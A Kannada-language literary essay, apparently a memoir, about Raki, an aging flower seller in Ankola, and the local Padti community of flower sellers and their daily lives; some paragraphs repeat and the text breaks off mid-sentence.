ಅಬ್ಬಲಿಗೆ ಮಾಲೆ

ಅವಳು ಕೊಟ್ಟ ಹೂ ಮಾಲೆ ಮುಡಿದು ಸ್ಕೂಟಿಯ ಮೇಲೆ ತಂಗಾಳಿಗೆ ಇನಿಯನ ನೆನಪಿಸಿಕೊಳ್ಳುತ್ತ ಹಿಂದೆ ಹೂ ಹಾರಾಡುವ ಅನುಭೂತಿಯನ್ನು ಮೈ ತುಂಬಿಕೊಂಡು, ಮನದುಂಬಿಕೊಂಡು ಸಣ್ಣಗೆ ಹಾಡು ಗುನುಗುತ್ತ ಹೊರಟ ಹೆಣ್ಮಕ್ಕಳ ಚೆಂದವನ್ನೋ… ಬೈಕ್‍ನ ಮುಂದಿನ ಪಾಕೆಟ್‍ನಲ್ಲಿ ಹೊಸ ಹೆಂಡತಿಗಾಗಿ ರಾಕಿ ಕೊಟ್ಟ ಮಲ್ಲಿಗೆ ಜಡೆಯನ್ನು ಬಾರಿ ಬಾರಿ ಮುಟ್ಟುತ್ತ ಹೊರಟ ಹೊಸಪೋರನನ್ನೋ ನೋಡಬೇಕೆಂದರೆ ನೀವು ಶಾಲ್ಮಲೆಯ ತಟದ ನಮ್ಮೂರು ಅಂಕೋಲೆಗೇ ಬರಬೇಕು.

ಬಾಲಾಜಿ ಅಂಗಡಿಯ ಬಾಗಿಲಲ್ಲಿ ಚಿಕ್ಕ ಹೂವಿನ ಚೆಬ್ಬೆಯೊಳಗೆ ಸದಾ ಹಸಿಹಸಿಯಾಗಿರುವ ಹಸಿರು ಬಾಳೆಯೆಲೆಯ ತುಂಡುಗಳನ್ನಿಟ್ಟು ಅದರ ಮೇಲೆ ಮುಟ್ಟಿದರೆಲ್ಲಿ ನೋಯುವುದೋ ಎಂಬಂತೆ ಒಂದಷ್ಟು ಘಮಗುಡುವ ತರಹೇವಾರಿ ಜಾಜಿ, ಅಚ್ಚಮಲ್ಲಿಗೆ, ಪಚ್ಚೆಕದಿರು, ಕನಕಾಂಬರ, ರಂಜಲ, ಉಪ್ಪಳಿ, ಮುತ್ತುಮಲ್ಲಿಗೆ, ಗೆಂಟಿಗೆ ಮುಂತಾದ ಹೂವಿನ ಜಡೆಗಳನ್ನೂ, ಮಾಲೆಯನ್ನೂ ಇಟ್ಟು ಕಳೆದ ಹತ್ತು ವರ್ಷದಿಂದ ‘ಹೂವಿನ ರಾಕಿ’ ಕುಳಿತುಕೊಳ್ಳುತ್ತಿದ್ದಾಳೆ. ಹಿಂದೆಲ್ಲ ಅಂಕೋಲೆಯ ಬಸ್ಟ್ಯಾಂಡು, ಮೀನುಪೇಟೆಯ ಮುರ್ಕಿ, ಜೈಹಿಂದ್ ಹೋಟೆಲ್ಲಿನ ಪಕ್ಕ ಹೀಗೆ ಎಲ್ಲೆಲ್ಲಿ ಹೆಣ್ಣು ಮನಸ್ಸುಗಳು ಹೆಚ್ಚಾಗಿ ಕಾಣಸಿಗುವರೋ ಅಲ್ಲೆಲ್ಲ ಹೂಬುಟ್ಟಿಯನ್ನು ತಳಗೈಯಲ್ಲಿ ಎತ್ತರಿಸಿ ಹಿಡಿದು ‘ಹೂ ಕೊಡ್ಲಾ ಮಗಾ?’ ಎಂದು ಕೇಳುತ್ತ ತಿರುಗುತ್ತಿದ್ದ ರಾಕಿ ಇತ್ತೀಚೆಗಿನ ವರ್ಷಗಳಲ್ಲಿ ಮಂಡಿನೋವಿನ ಕಾರಣದಿಂದಾಗಿ ತಿರುಗಾಡಲಾಗದೇ ತುಸು ಹೆಚ್ಚೇ ಹಣ್ಣಾಗಿದ್ದಾಳೆ.

ಇಪ್ಪತ್ತೈದು ವರ್ಷಗಳ ಹಿಂದೆ ಅಪ್ಪನ ಜೊತೆ ಅಪರೂಪಕ್ಕೊಮ್ಮೆ ಉದ್ದನ್ನ ಎರಡು ಜಡೆ ಇಳಿಬಿಟ್ಟುಕೊಂಡು ಪೇಟೆಗೆ ಬರುತ್ತಿದ್ದ ನನ್ನನ್ನು ದೂರದಿಂದಲೇ ಗುರ್ತಿಸಿ ಹೂವು ಮುಡಿಸಲು ಓಡಿಬರುತ್ತಿದ್ದ ಅವಳು ಈಗೀಗ ನನ್ನ ಮರೆಯುತ್ತಿದ್ದಾಳೆ. ಪ್ರತೀ ಬಾರಿಯೂ ನೆನಪಿಸಿಕೊಡಬೇಕಾದ ನನ್ನ ಜರೂರತ್ತಿಗೆ ಹಣೆಹಣೆ ಬಡಿದುಕೊಂಡು ತನ್ನ ಮಂದವಾಗುತ್ತಿರೋ ಕಣ್ಣುಗಳನ್ನ ಶಪಿಸಿಕೊಳ್ಳುತ್ತಿದ್ದಾಳೆ. ಕಡ್ಡಿಯ ಹಾಗಿದ್ದೆ ಮಗಾ ನೀನು. ಈಗ ದಪ್ಪಗೆ ಗುಂಡುಗುಂಡಗೆ ಆಗಿದ್ದೀ ಎಂದು ಕವಳಕೆಂಪಿನ ನಾಲ್ಕು ಹಲ್ಲಿನಲ್ಲಿ ಪಕಪಕನೆ ನಗುತ್ತ ನನ್ನನ್ನು ಗುರ್ತಿಸದ ಇನ್ನೊಂದು ಕಾರಣವನ್ನೂ ಮರೆಯದೇ ಹೇಳುತ್ತಾಳೆ.

‘ನಲವತ್ತು ವರ್ಷಕ್ಕೇ ಗಂಡ ಸತ್ತು ಮುಂಡೆಯಾಗಿಬಿಟ್ಟೆ… ನಿನ್ನಪ್ಪ ಊರ ಪಟೇಲ. ನಮ್ಮಂತಹ ಎಲ್ಲ ಬಡ ವಿಧವೆಯರ ಮನೆಯವರೆಗೆ ಹುಡುಕಿಕೊಂಡು ಬಂದು ವಿಧವಾ ವೇತನ ಮಂಜೂರಿ ಮಾಡಿಸಿ ಪೈಸೆ ಲಾಭವನ್ನೂ ಹಿಡಿಯದೇ ಹರಕು ಅಂಗಿ ಮುರುಕು ಸೈಕಲ್ಲಿನಲ್ಲೇ ಸತ್ತ… ಅವರ ಜೀವ ತಣ್ಣಗಿರಲಿ. ಇಕಾ ಈ ಗಮಗುಡುವ ಉಪ್ಪಳಿಹೂವಿನ ಮಾಲೆ ಅವರ ಪಟಕ್ಕೆ ಏರಿಸು’ ಎಂದು ಚಿಕ್ಕ ಬಾಳೆಎಲೆ ಹರಿದು ಹೂ ಸುತ್ತಿ ನನ್ನ ಕೈಗಿಡುತ್ತಾಳೆ ರಾಕಿ. ಸುಮ್ಮನೆ ನಿಟ್ಟುಸಿರನ್ನೂ ಕಣ್ಣಲ್ಲೆರಡು ಬಿಂದು ನೀರನ್ನೂ ತುಂಬಿಕೊಂಡು ಅದುವರೆಗೂ ಅವಳನ್ನೇ ನಿಟ್ಟಿಸುತ್ತಿದ್ದ ನಾನು ಅವಳ ಕ್ಷೇಮಸಮಾಚಾರ ವಿಚಾರಿಸಿ ಅವಳು ಕೈಯಲ್ಲಿ ಹಿಡಿಯಲು ಸುತರಾಂ ಒಪ್ಪದ ಹತ್ತು ರೂಪಾಯಿಯ ನೋಟೊಂದನ್ನು ಬುಟ್ಟಿಯಲ್ಲಿಟ್ಟು ಹೊರಡಲನುವಾಗುತ್ತಿದ್ದಂತೆಯೇ, ‘ನಿಲ್ಲು.. ನಿಲ್ಲು.. ಹೆಣ್ಮಕ್ಕಳು ಬರೀ ತಲೇಲಿ ಇರಬಾರದು. ಸಣ್ಣ ಅಬ್ಬಲಿ ಹೂವಿನ ಮಾಲೆ ಕೊಡುವೆ ಇರು’ ಎನ್ನುತ್ತ ಮೊಳದುದ್ದದ ಅಬ್ಬಲಿಗೆ ಮಾಲೆಯನ್ನು ಮೊಂಡು ಬ್ಲೇಡಿನಲ್ಲಿ ಕತ್ತರಿಸಿ ಕೈಗಿಟ್ಟು ಆಗಿಂದಾಗ್ಲೇ ಮುಡಿ ಅಂತ ಬೇಡಿಕೆಯಿಡುತ್ತಾಳೆ.

ಉದ್ದ ಜಡೆ ಹೋಗಿ ಮೋಟು ಜಡೆಯಾದ ಮೇಲೆ ನನ್ನ ಮೋಟು ಜಡೆಗೆ ಹೂವು ಚೆನ್ನಾಗಿ ಕಾಣಲ್ಲ ಎಂಬ ಸ್ವಯಂ ನಿರ್ಧಾರಕ್ಕೆ ಎಷ್ಟೋ ದಿನಗಳ ಹಿಂದೆಯೇ ಬಂದಿದ್ದ ನಾನು, ರಾಕಿಯ ಬಯಕೆಯ ಮುಂದೆ ನಿರುಪಾಯಳಾಗಿ ಕರಗಿಬಿಡುತ್ತೇನೆ.

ಉದ್ದ ಜಡೆ ಹೋಗಿ ಮೋಟು ಜಡೆಯಾದ ಮೇಲೆ ನನ್ನ ಮೋಟು ಜಡೆಗೆ ಹೂವು ಚೆನ್ನಾಗಿ ಕಾಣಲ್ಲ ಎಂಬ ಸ್ವಯಂ ನಿರ್ಧಾರಕ್ಕೆ ಎಷ್ಟೋ ದಿನಗಳ ಹಿಂದೆಯೇ ಬಂದಿದ್ದ ನಾನು, ರಾಕಿಯ ಬಯಕೆಯ ಮುಂದೆ ನಿರುಪಾಯಳಾಗಿ ಕರಗಿಬಿಡುತ್ತೇನೆ. ಎಲ್ಲ ಹಮ್ಮುಬಿಮ್ಮುಗಳನ್ನು ತೊರೆದು ನಡುಪೇಟೆಯ ತಾವಿನಲ್ಲೇ ಹೂ ಮುಡಿಸುವ, ಮುಡಿಯುವ ಪ್ರಕ್ರಿಯೆಗಳು ಆರಾಮಾಗಿ ಜರುಗುತ್ತವೆ. ಪಕ್ಕದ ಕಿರಾಣಿ ಅಂಗಡಿಗೆ ಬಂದ ಜಿ.ಸಿ.ಕಾಲೇಜಿನ ಮೇಡಮ್ಮು, ಬೇಕರಿಗೆ ಬಂದ ಶೀಳ್ಯದ ಸಣ್ತಮ್ಮ, ತನ್ನ ಎಮ್ಮೆಗಾಗಿ ದಾಂಬು ಕೊಳ್ಳಲು ಬಂದ ಹಾಲಕ್ಕಿ ವಾಸು, ಅಂಗಡಿ ಶೆಟ್ರು ಎಲ್ಲರೂ ಒಂದು ಸಣ್ಣ ಮಂದಹಾಸದೊಂದಿಗೆ ನಮ್ಮತ್ತಲೇ ನೋಡುತ್ತ ಆ ಖುಷಿಯಲ್ಲಿ ಭಾಗಿಗಳಾಗುತ್ತಾರೆ. ಅವಕಾಶವಿದ್ದರೆ, ನಾನೂ ನಗುತ್ತ ಅವರನ್ನೊಮ್ಮೆ ನೋಡಿದರೆ ‘ಬಾಯೇರೇ.. ಹೂ ಮುಡಿಸೇ ಬಿಟ್ಳೇನು ರಾಕಿ..?’ ಅಂತ ಒಂದು ಮಾತು ಹೊತಾಕುತ್ತಾರೆ.

ಈ ಗದ್ದಲ ಗೌಜಿಯ ಸರ್ವಾಂತರ್ಯಾಮೀ ಪೇಟೆಯಲ್ಲಿ ದೀಪಾವಳಿ, ಶ್ರಾವಣದ ಸಂದರ್ಭ ಬಿಟ್ರೆ ಹೂವಿಗಾಗಿಯೇ ಅಂತ ಹೇಳಿ ಈಗಿನ ಜನರೇಷನ್ನಿನ ಯಾರೆಂದರೆ ಯಾರೂ ಬರುವುದಿಲ್ಲ ಅನ್ನೋ ಸತ್ಯ ಗೊತ್ತಿದೆ ರಾಕಿಗೆ. ಹೂವಿಗಾಗಿ ಬರದೇ ತನ್ನ ಮಗಳ ಗ್ಯಾದರಿಂಗಿಗಾಗಿ ಶಾಲೆಯವರು ತರಲು ಹೇಳಿದ ಇದ್ದುದರಲ್ಲೇ ಸೋವಿ ಮತ್ತು ಚೆಂದದ ಕೆಂಪು ಫ್ರಿಲ್ಲಿನ ಅಂಗಿ ಸಿಗ್ತದೆಯೋ ಇಲ್ಲವೋ ಎಂಬ ಆತಂಕದೊಂದಿಗೆ ಸುವೇಗದಲ್ಲಿ ಬಟ್ಟೆಯಂಗಡಿ ಕಡೆ ಧಾವಿಸುವ ವಾಸಂತಿ, ಪಕ್ಕದ ಹಲ್ಲಿನ ಆಸ್ಪತ್ರೆಗೆ ನೋವು ತಡೆಯಲಾರದೇ ಸೆರಗು ಹೊದೆದು ಅದರ ಒಂದು ಚುಂಗಿನಲ್ಲಿ ಬಾಯಿಮುಚ್ಚಿಕೊಂಡು ಬಂದ ಕಮಲಕ್ಕ, ಎಲ್ಲ ಸಾಮಾನು ಕೊಂಡು ಮುಗಿದ ಮೇಲೆ ಕತ್ತಲೆಯಾಯ್ತು ಬೇಗ ಹೋಗಬೇಕು ಮನೆಗೆ ಎಂಬ ಕ್ಷೀಣ ಭಯವನ್ನಿಟ್ಟುಕೊಂಡು ಸಾಹೇಬರ ಮೊಟ್ಟೆಯಂಗಡಿಗೆ ಬಂದು ಅರ್ಜಂಟಿನಲ್ಲಿ ಅರ್ಧ ಡಜನ್ ಮೊಟ್ಟೆಗಾಗಿ ಅವಸರಿಸುತ್ತಿರುವ ಪಾರತಕ್ಕ -ಈ ಮುಂತಾದ ಎಲ್ಲರೂ ರಾಕಿಯ ಮುಂದಿಂದಲೇ ಹಾಯುತ್ತಾರೆ.

ಅವರೆಲ್ಲರ ಧಾವಂತದ ಅರಿವಿದೆ ರಾಕಿಗೆ. ಎಲ್ಲ ಸಾಮಾನು ಕೊಂಡಾದ ಮೇಲೆ ಬಾಕಿ ಸ್ವಲ್ಪ ಚಿಲ್ಲರೆ ಕೈಯಲ್ಲಿ ಉಳಿದರೆ ಮಾತ್ರ ಹೂವಿನ ವಿಚಾರ. ಮನಸ್ಸು ಖುಷಿ, ನೆಮ್ಮದಿಯಿಂದಿದ್ರೆ ಮಾತ್ರ ಹೂವಿನ ವಿಚಾರ. ದೇವರು ದಿಂಡರು ಎಂಬ ಭಯಭಕ್ತಿ ಇದ್ದರೆ ಮಾತ್ರ ಹೂವಿನ ವಿಚಾರ. ಜೀನ್ಸ್ ತೊಡದೇ ಸೀರೆಯುಟ್ಟ ಗಾಗ್ರಾ ಚೋಲಿ, ಚೂಡಿದಾರಕ್ಕೆ ಮಾತ್ರ ಹೂವಿನ ವಿಚಾರ ಅಂತಲೂ ಪಕ್ಕಾ ಗೊತ್ತಿದೆ ರಾಕಿಗೆ. ಹಾಗಾಗಿ ಅವಳು ಅವಸರಿಸುವುದಿಲ್ಲ. ಸಾವಧಾನದಿಂದಲೇ ‘ವಸ್ತ್ರ ತಕಣುಕೆ ಬಂದ್ರಿದ್ರೇನು ಅಮ್ಮಾ? ಆರಾಮಾಗಿ ಹೋಗಿ ತಕಂಡು ಬನ್ನಿ ನಾ ಇಲ್ಲೇ ಕುಂತಿರ್ತೆ. ಹೋಗುವಾಗ ಒಂದ್ ಜಡೆ ಅಬೋಲಿ ತಕಂಡೋಗುದು ಮರೀಬೇಡಿ…’ಎಂತಲೋ…

ಕುಲದೇವ ವೆಂಕಟ್ರಮಣ, ಮಹಮ್ಮಾಯೆ, ಶಾಂತಾದುರ್ಗಾ, ಸ್ಥಳೀಯ ಚೌಡಿ, ಮಾಸ್ತಿ, ಜಟಗ ಹೀಗೆ ಎಲ್ಲ ಅಂದರೆ ಎಲ್ಲ ದೇವಾನುದೇವತೆಯರು ಕೂಡ ಸ್ಥಳೀಯ ಹೂವಿಗೆ ಅದರ ಗಮತಕ್ಕೆ ಮಾರು ಹೋದ ಹಾಗೆ ಟ್ರಕ್ಕುಗಳಲ್ಲಿ ಎಲ್ಲಿಂದಲೋ ಬರುವ ಸೇವಂತಿ, ಕಾಕಡಾ, ಡೇರೆ ಮುಂತಾದ ಅಷ್ಟೇನೂ ಸುವಾಸನೆಯಿಲ್ಲದ ಅರೆಜೀವ ಹೂಗಳಿಗೆ ಮರುಳಾಗಿಬಿಡುವುದಿಲ್ಲ.

‘ತಂಗೀ… ಸಣ್‍ತಮ್ಮಗೆ ತಿಂಡಿ ತಕಣುಕೆ ಬೇಕರಿಗೆ ಬಂದೆಯಾ ಮಗಾ? ಹೋಗು ಹೋಗು ತಕೊಂಡು ಬಾ. ಕಡೆಗೆ ಹೋಗುವಾಗ ಒಂದು ಮಲ್ಲಿಗೆ ಜಡೆ ಕೊಡ್ತಿ ಮುಡ್ಕಂಡು ಹೋಗು’ ಅನ್ನುತ್ತಲೋ… ಗೋಪಾಲಣ್ಣನ ಹೊಟೇಲಿಗೆ ಜಿಲೇಬಿ ಕೊಳ್ಳಲು ಬಂದ ಹೊಸದಾಗಿ ಮದುವೆಯಾದ ಬೋಳೆಯ ಗೋಪುಗೆ ‘ತಮಾ ಆರಾಮಿದ್ದೀಯೇನು..? ಈ ಅಜ್ಜಿಗೆ ನಿನ್ ಮದ್ವೆಗೆ ಕರೀದೇ ಹೋದೇ ನೀನು? ಹೆಂಡ್ತಿ ಹೆಂಗೀದು.? ಒಂದಿನ ಕರ್ಕಂಡು ಬಾರೋ… ಮುದಕಿ ನೋಡ್ಕಂಡು ಸಾಯ್ತೆ… ಇಕಾ ಈ ಹೂ ತಕಂಡೋಗಿ ಮುಡ್ಸು ನನ್ ಮೊಮ್ಮಗಳಿಗೆ…’ ಅನ್ನುತ್ತ ಎಲ್ರನ್ನೂ ಒಳಗೊಳ್ಳುತ್ತಾಳೆ ರಾಕಿ. ಸಿಡುಕು ಮುಖದ, ಹ್ಯಾಪ್ ಮೋರೆಯ, ಚಿಂತಾಕ್ರಾಂತ ಮನಸ್ಸಿನ, ಎಲ್ಲ ಮಾನವ ಮಾನವಿಯರಿಗೂ ಕ್ಷಣಖುಷಿಯ ಮುಲಾಮು ಬಳಿಯುವ ರಾಕಿಯ ಮಾತುಗಳಿಗೆ ಮತ್ತು ಅದರ ಜೊತೆಗಿನ ಹೂವುಗಳಿಗೆ ವಿಚಿತ್ರ ನೆಮ್ಮದಿ ಮತ್ತು ಹಸನ್ಮುಖತೆಯನ್ನು ದಯಪಾಲಿಸುವ ಶಕ್ತಿ ಇದೆ.

ಅವಳು ಕೊಟ್ಟ ಹೂ ಮಾಲೆ ಮುಡಿದು ಸ್ಕೂಟಿಯ ಮೇಲೆ ತಂಗಾಳಿಗೆ ಇನಿಯನ ನೆನಪಿಸಿಕೊಳ್ಳುತ್ತ ಹಿಂದೆ ಹೂ ಹಾರಾಡುವ ಅನುಭೂತಿಯನ್ನು ಮೈ ತುಂಬಿಕೊಂಡು, ಮನದುಂಬಿಕೊಂಡು ಸಣ್ಣಗೆ ಹಾಡು ಗುನುಗುತ್ತ ಹೊರಟ ಹೆಣ್ಮಕ್ಕಳ ಚೆಂದವನ್ನೋ… ಬೈಕ್‍ನ ಮುಂದಿನ ಪಾಕೆಟ್‍ನಲ್ಲಿ ಹೊಸ ಹೆಂಡತಿಗಾಗಿ ರಾಕಿ ಕೊಟ್ಟ ಮಲ್ಲಿಗೆ ಜಡೆಯನ್ನು ಬಾರಿ ಬಾರಿ ಮುಟ್ಟುತ್ತ ಹೊರಟ ಹೊಸಪೋರನನ್ನೋ ನೋಡಬೇಕೆಂದರೆ ನೀವು ಶಾಲ್ಮಲೆಯ ತಟದ ನಮ್ಮೂರು ಅಂಕೋಲೆಗೇ ಬರಬೇಕು.

ಪ್ರತಿದಿನದ ಬೆಳಗೂ ಬೈಗೂ ಹೂವನ್ನೇ ಧ್ಯಾನಿಸುವ, ಎಂದೂ ಹೂವನ್ನೆ ಮುಡಿಯಲು ಬಯಸದೇ… ಬಯಕೆಯಾದರೂ ಕೊಂಚ ಮಾಸಿದ, ಹಳತಾದ, ಹಳದಿಯಾದ ಹೂಗಳನ್ನಷ್ಟೇ ಮುಡಿಯುವ, ಹೊಸ ಹೂವು ಮಾರಾಟಕ್ಕೆ ಬಳಕೆಯಾದರೆ ಹೊತ್ತಿನ ಗಂಜಿಗಾದೀತು ಎಂದು ವಿಚಾರಮಾಡುವ ಮಹಿಳೆಯೀಕೆ. ಊಟ, ತಿಂಡಿ, ಶಿಕ್ಷಣ ಎಲ್ಲದಕ್ಕೂ ಲೋಕಲ್ ಹೂವಿನ ವ್ಯಾಪಾರವನ್ನೇ ಅವಲಂಬಿಸಿರುವ, ಅಂಕೋಲೆಗೆ ಮಾತ್ರ ಸೀಮಿತವಿರುವ ರಾಕಿಯ ಅಜ್ಜಿ ಮುತ್ತಜ್ಜಿಯರಿಂದ ಹಿಡಿದು ಮಕ್ಕಳು ಮೊಮ್ಮಕ್ಕಳಾದಿಯಾಗಿ ಎಲ್ಲರನ್ನೂ ಒಳಗೊಂಡಿರುವ ‘ಪಡ್ತಿ’ ಎಂಬ ಜನಪದವಿದೆ ಇಲ್ಲಿ. ದೂರದ ಲಾರಿಗಳಿಂದ, ಗೂಡ್ಸ ಗಾಡಿಗಳಿಂದ ಬಂದು ರಸ್ತೆಯ ಯಾವುದೋ ಗುತ್ತಿನಲ್ಲಿ ನಸುಕಿನಲ್ಲಿ ಬಿದ್ದು, ಗೋಣಿತಾಟಿನಲ್ಲಿ ಇದ್ದು, ಎತ್ತಿಕೊಂಡೊಯ್ಯುವ ಯಾರಿಗಾಗಿಯೋ ಕಾಯುವ ಎಲ್ಲಿಂದಲೋ ಬರುವ ಹೂಗಳ ಕಡೆ ಅಪ್ಪಿತಪ್ಪಿಯೂ ದೃಷ್ಟಿ ಹಾಯಿಸರು ಇವರ್ಯಾರೂ.

ಕುಲದೇವ ವೆಂಕಟ್ರಮಣ, ಮಹಮ್ಮಾಯೆ, ಶಾಂತಾದುರ್ಗಾ, ಸ್ಥಳೀಯ ಚೌಡಿ, ಮಾಸ್ತಿ, ಜಟಗ ಹೀಗೆ ಎಲ್ಲ ಅಂದರೆ ಎಲ್ಲ ದೇವಾನುದೇವತೆಯರು ಕೂಡ ಸ್ಥಳೀಯ ಹೂವಿಗೆ ಅದರ ಗಮತಕ್ಕೆ ಮಾರು ಹೋದ ಹಾಗೆ ಟ್ರಕ್ಕುಗಳಲ್ಲಿ ಎಲ್ಲಿಂದಲೋ ಬರುವ ಸೇವಂತಿ, ಕಾಕಡಾ, ಡೇರೆ ಮುಂತಾದ ಅಷ್ಟೇನೂ ಸುವಾಸನೆಯಿಲ್ಲದ ಅರೆಜೀವ ಹೂಗಳಿಗೆ ಮರುಳಾಗಿಬಿಡುವುದಿಲ್ಲ. ಹಾಗಾಗಿ ಸೊನಗಾರ ರಜನಿ, ಆಗೇರ ಸುಮನಾ, ಹಾಲಕ್ಕಿ ಸೋಮಿ, ನಾಡೋರ ಭವಾನಿ ಕೂಡ ಮಣಗಟ್ಟಲೆ ಕಂಗೊಳಿಸುವ ಸೇವಂತಿ, ಕಾಕಡಾ ಅಂಗಡಿಯನ್ನು ದಾಟಿ ಬಂದು ಪಡ್ತಿಗಳ ಚೆಬ್ಬೆಯನ್ನು ಎಡತಾಕುತ್ತಾರೆ. ಬಗ್ಗಿ ಬಗ್ಗಿ ‘ಜಾಜಿ ಹೂಂಗು ಈದೇನೇ?’, ‘ದುಂಡು ಮಲ್ಲಿಗೆ ಜಡೆ ತರಲಾ ಇಂದೆ?’ ಎನ್ನುತ್ತ ಇದ್ದುದರಲ್ಲೇ ಹೊಂದಿಕೆಯಾದ ಹೂವನ್ನು ದೇವರಿಗೊಂದಿಷ್ಟು ತಮಗೊಂದಿಷ್ಟು ಒಯ್ಯುತ್ತಾರೆ.

ಸದಾ ಹೂವಿನ ಸಂಸರ್ಗದಲ್ಲೇ ಇರುವ ರಾಕಿ ಮತ್ತು ಅವಳಂತ ಅವ್ವಂದಿರು ಸುತ್ತಲಿನ ಚೌಕದಳ್ಳಿಯ ಊರುಗಳ ಯಾರ್ಯಾರ ಮನೆಯಲ್ಲಿ ಯಾವ್ಯಾವ ಹೂಗಿಡಗಳಿವೆ ಎಂದು ಗುರ್ತಿಟ್ಟುಕೊಂಡು ನಸುಕಿಗೇ ಮನೆಮನೆಗಳಿಗೆ ಎಡತಾಕುವ ಕ್ರಿಯೆ ಅಂದಿನಿಂದ ಇಂದಿನವರೆಗೂ ಅನೂಚಾನವಾಗಿ ನಡೆದುಕೊಂಡು ಬಂದಿದೆ. ನುಗ್ಗೇಕಾಯಿ ಆಗುವ ದಿನಕ್ಕೆ ನುಗ್ಗೇಮರ ಕೂಡ ಗೆಲ್ಲು ಮುರಿದು ಹೋಗುವಷ್ಟು ಕಾಯಿ ಹಿಡಿಸಿಕೊಂಡು ಸ್ವಲ್ಪ ಭಾರ ಇಳಿಸಲು ಬನ್ರೇ ತಾಯಂದಿರಾ ಎನ್ನುತ್ತ ಅವರಿಗಾಗಿ ಕಾದಿರುತ್ತದೆ. ಹಾಗೇ ಬಂಡಿಹಬ್ಬ ಹತ್ತಿರಬಂದರೆ ಕೋಳಿಗೂಡಿನ ಕೋಳಿಗಳೂ ಸೈತ ಜೋಡಿ ಕಾಲುಕಟ್ಟಿಕೊಂಡು ಬಿಕರಿಯಾಗಲು ಇವರ ಚೀಲದಲ್ಲಿ ಪೇಟೆಯ ದಾರಿ ಹಿಡಿಯುತ್ತವೆ.

ಹೂವಿಗಾಗಿ ಬಂದ ಹೆಣ್ಣುಕರುಳುಗಳ ನೈಲಾನ್ ಚೀಲದಲ್ಲಿ ಈ ಕುಂಯ್ ಕುಂಯ್‍ಗಳಿಗಾಗಿಯೇ ತರುವ ಬ್ರೆಡ್ಡು, ಟೋಸ್ಟಿನ ಚೂರುಗಳು ಅಂಗಳದಲ್ಲಿ ಬಿದ್ದು ಕರಿಯ, ಟಾಮಿಯಾದಿಯಾಗಿ ಸರ್ವ ಶ್ವಾನ ಕುಲವನ್ನು ಸಂತೃಪ್ತಿಪಡಿಸುತ್ತವೆ.

ಎಲ್ಲ ಮನೆಯ ನಾಯಿಕುನ್ನಿಗಳೂ ಈ ರಾಕಿ, ಗುಲಾಬಿ, ಸರೋಜಾ, ಸುಮಿತ್ರಾರನ್ನು ಬಾಲ ಆಡಿಸುತ್ತ ಅವ್ವಗಳಿರಾ ಅಕ್ಕಗಳಿರಾ ಎಂದು ಒಪ್ಪಿಕೊಂಡುಬಿಟ್ಟಿವೆ. ಅಕಸ್ಮಾತ್ ಒಂದು ಬೊಗಳುವಿಕೆ ಎಲ್ಲಿಂದಾದರೂ ಹಾರಿ ಬಂತೋ.. ಅಂದಿನ ಕಾಲದ, ‘ಯಾಕೋ ಕರಿಯ..? ಇಂದೇನು ಹೊಸ ನಮೂನಿ ನಿಂದು..? ನಾನೋ ತಿಮ್ಮಿ.. ಗುತ್ತಾಗುದಿಲ್ವೇನೋ ನಿಂಗೆ’ ಎಂಬ ಜಬರ್ದಸ್ತಿಯ ಧ್ವನಿ ಇಂದಿನ ಕಾಲಕ್ಕೆ ‘ಯಾಕೋ ಟೈಗರಪ್ಪಾ ಇಂದೇನೋ ಗೌಜಿ.. ನಾನೋ ಸುಮಿತ್ರಾ ಹೂ ಕೊಯ್ಯುಕೆ ಬಂದಿ ಗುತ್ತಾಗುದಿಲ್ವೇನೋ ನಿಂಗೆ’ ಎಂದು ಪರಿವರ್ತನೆಯಾಗಿದೆ ಅಷ್ಟೇ ಬಿಟ್ರೆ ನಡೆಯುವ ಕ್ರಿಯೆಯಲ್ಲೇನೂ ಹುಂಡು ಬದಲಾವಣೆಯಿಲ್ಲ. ಹಾಗಾಗಿ ಹಾರಿ ಬಂದ ಬೊಗಳಿನ ಏರುಧ್ವನಿ ಅಂತರ್ಧಾನವಾಗಿ ಅದಾಗಲೇ ಕುಂಯ್ ಕುಂಯ್ ಸಂಗೀತ ಹೂವಿನ ಮನೆಯಲ್ಲಿ ಆರಂಭವಾಗಿಬಿಟ್ಟಿರುತ್ತದೆ. ಹಾಗೂ ಹೂವಿಗಾಗಿ ಬಂದ ಹೆಣ್ಣುಕರುಳುಗಳ ನೈಲಾನ್ ಚೀಲದಲ್ಲಿ ಈ ಕುಂಯ್ ಕುಂಯ್‍ಗಳಿಗಾಗಿಯೇ ತರುವ ಬ್ರೆಡ್ಡು, ಟೋಸ್ಟಿನ ಚೂರುಗಳು ಅಂಗಳದಲ್ಲಿ ಬಿದ್ದು ಕರಿಯ, ಟಾಮಿಯಾದಿಯಾಗಿ ಸರ್ವ ಶ್ವಾನ ಕುಲವನ್ನು ಸಂತೃಪ್ತಿಪಡಿಸುತ್ತವೆ.

ಅನೂಚಾನವಾಗಿ ಅಂದಿನಿಂದ ಇಂದಿನವರೆಗೂ ಪಡ್ತಿಗಳು ಎರಡ್ಹೊತ್ತಿನ ಊಟ, ಮಕ್ಕಳ ಶಾಲೆ, ಎರಡು ಪಕ್ಕೆಯ ಚಿಕ್ಕ ಮನೆ ಹೀಗೆ ಬದುಕಿನ ಸೀಮಿತ ಪರಿಧಿಯಲ್ಲಿ ಹೂವಿನೊಂದಿಗೆ ಇದ್ದುದರಲ್ಲೇ ಅಚ್ಚುಕಟ್ಟಾಗಿದ್ದಾರೆ. ಸರದಿ ಸಾಲುಗಳ ಹಬ್ಬದ ತಿಂಗಳುಗಳಾದ ಜೂನ್ ಜುಲೈ ತಿಂಗಳ ಆರಂಭದಲ್ಲಿ ನಸುಕಿನ ಮೂರಕ್ಕೇ ಅವರಿಗೆ ಬೆಳಗಾಗಿಬಿಡುತ್ತದೆ. ಸುತ್ತಲಿನ ಬೇಣ, ಹಕ್ಕಲ ಇದ್ದವರು ನೆಟ್ಟು ಬೆಳೆಸಿದ ನೂರಾರು ಜಾಜಿ ಮತ್ತು ಮಲ್ಲಿಗೆ ಪೊದೆಗಳಲ್ಲಿ ಅಂದಿನ ಮೊಗ್ಗು ದೊಡ್ಡದಾಗುತ್ತಿರುವ ಹೊತ್ತು ಅದು. ಹೊತ್ತೇರಿದರೆ ಮೊಗ್ಗು ಅರಳಿಬಿಡುವ ಆತಂಕ. ಹಾಗಾಗಿ ಒಂದಿಷ್ಟು ಆಳೂ ಕಾಳೂ ಹಾಕಿ ಅವರ ಜೊತೆಗೂಡಿ ಬೆಳಗಿನ ಏಳು ಎಂಟಕ್ಕೆಲ್ಲ ಮೊದಲೇ ಗುತ್ತಿಗೆ ಹಿಡಿದ ಪೊದೆಗಳ 